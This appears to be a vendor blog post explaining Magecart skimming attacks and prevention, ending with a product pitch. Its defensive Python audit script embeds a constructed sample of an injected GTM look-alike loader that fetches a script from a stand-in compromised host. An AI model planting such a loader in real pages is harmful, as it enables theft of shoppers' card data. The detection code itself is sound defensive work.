
Magecart - The Resurgence of Magecart Attacks

Benjamin Hosack

Magecart attacks, named for their initial focus on Magento-based ecommerce platforms, first surged in 2015, marking one of the largest campaigns in eCommerce attack history. Exploiting vulnerabilities within Magento, notably the Shoplift/SUPEE 5344, attackers infiltrated thousands of websites.


In a basic Magecart attack, malicious code was injected into a site's JavaScript source code, acting as a skimmer to pilfer cardholder data and personal information during checkout. This data was then encoded/encrypted and exfiltrated to remote systems controlled by the attackers.


Magecart malware detection

Between 2015 and 2022, the prevalence of Magecart attacks skyrocketed, with our partner, Foregenix, at the forefront of incident response and investigation, aiding medium to large-scale enterprises in containing and eradicating breaches swiftly.


In 2023, a resurgence of Magecart attacks has been observed, marked by more sophisticated evasion tactics (read about "Stealthy Malware").


Recent investigations reveal attackers initiating breaches by compromising internet-connected computers to serve as command and control (C2) servers for hosting malicious code. Exploiting vulnerabilities like CVE-2022-24086/7 on unpatched Magento sites, attackers inject malicious JavaScript, often disguised as a Google Tag Manager (GTM) script. This loader then fetches malware, such as a fake payment page, from compromised legitimate sites acting as C2 servers, enabling the harvesting and exfiltration of cardholder data.


Combining traditional Magecart techniques with these modern methods improves both evasion and effectiveness: the injected GTM look-alike passes for a legitimate tag to IT personnel who are not expecting it.


Preventing these attacks requires proactive measures:

  • Regularly update and patch software to mitigate known vulnerabilities, reducing the attack surface.

  • Conduct regular security audits to monitor JavaScript integrity and detect any unauthorized alterations or injections.

  • Implement File Integrity Monitoring (FIM) to promptly detect and respond to unauthorized file modifications.

  • Enforce regular password reviews and rotations, ideally every ninety days.

  • Implement HTTP Content Security Policy Headers to bolster defense against code injection attacks like clickjacking and XSS.
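As an added illustration of the JavaScript integrity audit and allowlisting recommended above (example code written for this page, not ThreatView's or Foregenix's tooling; the hostnames, the shortened GTM loader and the baseline are constructed assumptions), this Python audit flags inline scripts that drift from a known-good baseline and any script that loads from, or contacts, a host outside the allowlist, which is exactly how a GTM look-alike that pulls its payload from a compromised third-party site stands out:

```python
import hashlib
import re
from urllib.parse import urlparse

# Hosts that scripts on the checkout page may load from or contact (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "www.googletagmanager.com"}

# Known-good GTM loader captured from a clean snapshot of the page (constructed, shortened).
KNOWN_GOOD_GTM = ("(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);"
                  "j.src='https://www.googletagmanager.com/gtm.js?id='+i;"
                  "d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-PLACEHOLDER');")

# Constructed look-alike: same shape as the GTM loader, but the payload comes from a host
# standing in for a compromised legitimate site used as C2.
INJECTED = ("(function(w,d,s,l,i){var j=d.createElement(s);"
            "j.src='https://compromised-site.example/gtm.js?id='+i;"
            "d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-PLACEHOLDER');")

# Constructed checkout page containing the genuine loader and the injected one.
SAMPLE_HTML = ('<html><head>\n<script src="https://shop.example/static/checkout.js"></script>\n'
               '<script>' + KNOWN_GOOD_GTM + '</script>\n'
               '<script>' + INJECTED + '</script>\n</head><body></body></html>')

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
URL_RE = re.compile(r"""https?://[^\s"'()<>]+""", re.I)

def fingerprint(script_body):
    """SHA-256 of an inline script (whitespace-trimmed) for baseline comparison."""
    return hashlib.sha256(script_body.strip().encode()).hexdigest()

# Baseline of inline-script hashes taken from the clean snapshot.
BASELINE = {fingerprint(KNOWN_GOOD_GTM)}

def audit_scripts(html, allowed_hosts, baseline):
    """Return (finding, detail) tuples for scripts outside the allowlist or baseline."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:                                        # external script: check its host
            host = urlparse(src.group(1)).hostname
            if host not in allowed_hosts:
                findings.append(("external_script_unlisted_host", host))
            continue
        if fingerprint(body) not in baseline:          # inline script: compare with baseline
            findings.append(("inline_script_not_in_baseline", fingerprint(body)[:16]))
        for url in URL_RE.findall(body):               # and check every host it references
            host = urlparse(url).hostname
            if host not in allowed_hosts:
                findings.append(("inline_script_contacts_unlisted_host", host))
    return findings
```

Run against a live snapshot of the checkout page after each deployment, an empty result means nothing has drifted from the baseline; anything else deserves a look before the next customer checks out.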


ThreatView Advanced provides eCommerce sites with the capability of detecting and alerting on attacks in real time, backed by one of the industry's most experienced teams of eCommerce Incident Response specialists, ensuring swift response and containment with minimal disruption to business operations and revenue generation.


Explore our website security solutions with ThreatView for free to safeguard your website effectively.


